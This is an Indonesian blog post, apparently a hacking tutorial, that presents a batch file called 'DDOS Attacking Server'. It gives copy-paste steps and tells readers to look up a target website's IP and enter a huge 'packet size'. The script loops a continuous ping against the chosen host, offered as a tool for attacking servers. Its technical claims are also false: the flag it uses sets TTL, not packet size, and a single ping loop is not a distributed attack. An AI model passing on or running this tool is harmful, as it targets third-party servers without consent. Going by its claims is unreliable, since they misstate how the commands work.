
langsung aja tanpa banyak omong, cek cek cekidot :D
1. Buka Notepad
2. Copast Text dibawah ini di Notepad
@echo off
mode 67,16
title DDOS Attacking Server
color 0c
cls
echo ==================================
echo = Hacking Tools =
echo ==================================
echo.
echo +++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server +
echo + Author : Rifqi Hasan +
echo + Visit : www.rifqi-hasan.blogspot.com +
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo * Masukan IP / Host Target *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
3. Setelah Sudah di copast save text tersebut dengan Extensi.bat
Contoh: [ DDoS.bat ] tetapi "Save As Type" dirubah menjadi "All Files" Terlebih dahulu
Cara menggunakannya:
1. Buka DDoS.bat yang sudah disimpan
2. Masukan IP Target yang mau di DDoS
bagaimana cara mencarinya?
- Buka Command Prompt di Windows
- Ketikan "ping www.website-target.com" tanpa kutip
sebagai contoh ini ane kasih gambarannya, tapi jangan diikutin IPnya :p
3. Lalu Packet Sizenya Contoh " 10000000 " tanpa kutip
Post a Comment
Click to see the code!
To insert emoticon you must added at least one space before the code.